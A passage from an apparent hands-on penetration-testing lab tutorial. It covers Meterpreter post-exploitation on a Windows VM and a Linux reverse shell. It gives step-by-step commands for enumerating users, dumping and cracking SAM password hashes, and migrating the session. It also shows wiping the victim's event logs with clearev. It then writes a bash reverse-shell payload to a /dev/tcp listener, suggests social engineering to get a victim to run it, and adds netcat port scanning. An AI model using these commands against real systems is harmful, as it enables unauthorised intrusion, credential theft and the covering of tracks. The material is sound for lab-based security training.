-------------------------------------------------------------------------------------------------------------------------------

20.	Type payload.exe then net user to verify
		i.	…type net user /help for more options n
		ii.	…type net /h for other options

21.	Type net user > list.txt
		i.	…it creates a list of all users

22.	The whoami command is a very useful and powerful tool indeed!
	a.	Type whoami /all
		i.	…shows you the current user rights to the system and other info
	b.	Type whoami /user
		i.	…shows you the current user SID
	c.	Type whoami /priv
		i.	…shows you the current user security privileges
	d.	 Type whoami /?
		i.	…shows the menu

23.	Type whoami /all > curr_user.txt
		i.	…it exports to a text file the current user data

24.	Type exit to exit the Windows shell
		i.	…you’re back in meterpreter

-------------------------------------------------------------------------------------------------------------------------------
Note: Did you know that you can dir to the victim from meterpreter without being in shell? Did you also noticed that this sentence made sense to you?!
-------------------------------------------------------------------------------------------------------------------------------

25.	These two commands are useful to have and only work from meterpreter and not from inside the Windows shell
	a.	Type sysinfo
		i.	…to view info of the machine
	b.	Type ps
		i.	…to view processes on the machine…do you see evildoer?

26.	While in meterpreter, download the two files you just created
	a.	Type download –f c:\\users\\<username>\\downloads\\list.txt
	b.	Type download –f c:\\users\\<username>\\downloads\\curr_user.txt
	c.	Type ls to verify they were downloaded
		i.	…if they exist

27.	Use cat to view the files
	a.	Type cat list.txt
	b.	Type cat curr_user.txt

-------------------------------------------------------------------------------------------------------------------------------
Note: I tried writing a small BASH script and found out that using a text editor like nano from within msfconsole will crash/freeze
the session even if you put it in the background. If this happens to you don’t forget to check how many sessions you have running
when you return to what you were doing; also kill any unused sessions that may be running
-------------------------------------------------------------------------------------------------------------------------------

28.	Let’s try and get a hash dump to get into the system’s SAM file which holds all users and their keys…this may disconnect you
	a.	Type run hashdump
		i.	…you now have the SAM file with users and keys
		ii.	…the first part before of the hash (before the colon) is not as important anymore because there are not a lot of XP systems in
		the wild unless you count ATM machines; the second part you can use against a rainbow table in a program or an online rainbow table website

-------------------------------------------------------------------------------------------------------------------------------
Note: Take a look at the numbers in the hash dump…what is 500 and 501? Google what they mean.
-------------------------------------------------------------------------------------------------------------------------------

29.	Copy the second part of the hash and just before the triple colons for the evildoer user
	a.	Then open your browser and go to https://hashkiller.co.uk/ntlm-decrypter.aspx
	b.	Use Ctrl+C to paste the hash in it
	c.	Scroll down and enter the CAPTCHA then hit the submit button
	d.	Scroll up and verify your hash was found…it will also give you the password on the right side box

-------------------------------------------------------------------------------------------------------------------------------
Note: XP uses NT, Windows 7 and later uses NTLM
-------------------------------------------------------------------------------------------------------------------------------

30.	Since you now have the hash dump you can take all of them and save them with notepad++ so you can run them through rainbow tables

31.	To prevent the connection from begin dropped we’ll move the session to that machine to maintain the connection…
	a.	Type run post/windows/manage/migrate
		i.	…it will display a new program in memory possible notepad

32.	Go to the Windows VM and open Task Manager
	a.	In the Processes tab find the evildoer process and end the process

33.	Go back to Kali…it will show a “session 1 closed. Reason: Died” message
	a.	Type dir
		i.	…you will get the directory from the Windows VM machine
	b.	Type shell
		i.	...it will show you a “Failed to spawn” error but it connected anyway
	c.	Type exit

34.	Type clearev
		i.	…clears the Application, System and Security logs at the victim’s machine…not really stealthy but will do the job


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STEP #13: GETTING A REVERSE SHELL IN LINUX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You will need another Linux VM for this step.

1.	Setup the Linux VM to use 2GB RAM and a 2 CPUs

2.	Let’s create a bash script payload…open a terminal screen and…
	a.	Type nano evilfile.sh
	b.	Enter the following:
		i.	/bin/bash –i > /dev/tcp/<kali_ip_address>/8080 0<&1 2>&1
	c.	Ctrl+X to save, Y to save

3.	Give the file executable rights…
	a.	Type chmod 755 evilfile.sh
		i.	…you can run it on the victim’s side using ./evilfile.sh

4.	Now we get the victim to download the file. You can do it through social engineering or as a download through the Apache website or even easier to move the file using a USB stick.

5.	In Kali, we’ll put a netcat session in listening mode…
	a.	Type nc –nlvp 8080
		i.	…nc is in listening mode

6.	At the victim’s machine…
	a.	Find the file and type ./evilfile.sh

-------------------------------------------------------------------------------------------------------------------------------
Note: Have you ever used the TAB key? Type the first two or three letters of a filename then hit TAB…you’re welcome!
-------------------------------------------------------------------------------------------------------------------------------

7.	Back in Kali you will see that the victim has connected to us…

8.	So many things to do here…
	a.	Type hostname
		i.	…shows you the current user
	b.	Type id
		i.	…to see the UID’s for the user, groups, admin, etc
	c.	Type ifconfig
		i.	…to get the IP address
	d.	Type blkid
		i.	…shows you all the devices attached
	e.	Type netstat –tulpn
		i.	…shows open listening ports
	f.	Type service --status-all
		i.	…shows you all services running
	g.	Type uname –a
		i.	…shows you the Linux version and architecture
	h.	Type less /etc/passwd
		i.	…shows you the users and rights
	i.	Type df –h
		i.	…shows you the hard drive space
	j.	Type lspci
		i.	…shows you the PCI bridges, controllers and devices

-------------------------------------------------------------------------------------------------------------------------------
Note: UIDs are the equivalent of SAM files in Windows
-------------------------------------------------------------------------------------------------------------------------------

9.	We cannot use nmap within netcat but we can use netcat to do a scan for us…
	a.	Type nc –v –w 1 <victim_ip_address> -z 1-1000
		i.	…-v is verbose, -w 1 wait 1sec, -z operates in zero I/O mode which ignores any latency from the CPU, 1-1000 are the ports
	b.	Type nc –nuvw 2 <victim_ip_address> -z 1-1000
		i.	…n bypasses the name resolution, u is for UDP ports
		ii.	…adding extra seconds can make it more accurate
		iii.	…search for what other great things you can do with netcat

10.	Let’s upload a file to the victim…
	a.	Type nc <victim_ip_address> < file.txt
